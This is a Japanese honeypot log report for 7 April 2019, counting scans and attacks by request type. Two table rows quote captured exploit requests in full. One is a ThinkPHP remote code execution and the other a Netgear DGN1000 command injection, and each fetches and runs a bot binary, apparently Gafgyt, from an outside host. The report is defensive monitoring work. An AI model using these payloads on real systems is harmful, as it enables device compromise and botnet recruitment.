BW-Potのログ分析 (2019/04/07)
本日の総アクセス件数は644件です。送信元IP数は90IPです。
昨日来ていたNetgear ルータ DGN1000 に関する攻撃において、
wgetを行う宛先が変わっておりました。
本日の宛先からは、legion.mipsのダウンロードが可能でした。
VirusTotalによるとGafgytのようです。
| 件数 | 種別 | リクエスト |
| 355 | アクセス | GET / |
| 205 | phpMyAdminに関する攻撃 | POST /phpmyadmin/ |
| 50 | Tomcat管理ページへのブルートフォース攻撃 | GET /manager/html |
| 3 | 環境設定の調査 | GET /.env |
| 3 | FreePBXに関する調査 | GET /admin/assets/js/views/login.js |
| 2 | 不正中継の調査 | GET www.123cha[.]com/ |
| 2 | ConferenceManagementSystem Colibriに関する調査 | GET /colibri/conferences |
| 2 | ThinkPHPに関する攻撃 | GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20hxxp://love.thotiana[.]live/bins/x86.bot;cat%20x86.bot%20>%20fucklol;chmod%20777%20fucklol;./fucklol%20thinkphp |
| 2 | phpMyAdminに関する調査(ZmEuによるスキャン) | GET /phpMyAdmin/scripts/setup.php |
| 2 | Netgear ルータ DGN1000 に関する攻撃 | GET /setup.cgi?next_file=afr.cfg&todo=syscmd&cmd=wget%20hxxp://104.248.88[.]250/legion.mips%20-O%20/var/tmp/legion.mips;%20chmod%20777%20/var/tmp/legion.mips;%20/var/tmp/legion.mips;%20rm%20-rf%20/var/tmp/legion.mips&curpath=/¤tsetting.htm=1 |
| 2 | phpMyAdminに関する調査(ZmEuによるスキャン) | GET /w00tw00t.at.blackhats.romanian.anti-sec:) |
| 1 | 不正中継の調査 | GET api.ipify[.]org/ |
| 1 | 不正中継の調査 | GET www.epochtimes[.]com/ |
| 1 | 不正中継の調査 | GET www.ip[.]cn/ |
| 1 | 不正中継の調査 | GET www.minghui[.]org/ |
| 1 | 不正中継の調査 | GET www.wujieliulan[.]com/ |
| 1 | phpMyAdminに関する調査 | GET /MyAdmin/scripts/setup.php |
| 1 | 不明 | GET /admin-scripts.asp |
| 1 | 不正中継の調査 | GET api.binance[.]com/api/v1/time |
| 1 | 不正中継の調査 | GET www.rfa[.]org/english/ |
| 1 | phpMyAdminに関する調査(ZmEuによるスキャン) | GET /myadmin/scripts/setup.php |
| 1 | phpMyAdminに関する調査(ZmEuによるスキャン) | GET /phpmyadmin/scripts/setup.php |
| 1 | phpMyAdminに関する調査(ZmEuによるスキャン) | GET /pma/scripts/setup.php |
| 1 | クローリング | HEAD /robots.txt |
| 1 | 不明 | GET /script |
| 1 | Linksysの脆弱性に関する調査 | GET /tmUnblock.cgi |
| 1 | Linksysの脆弱性に関する調査 | POST /tmUnblock.cgi |
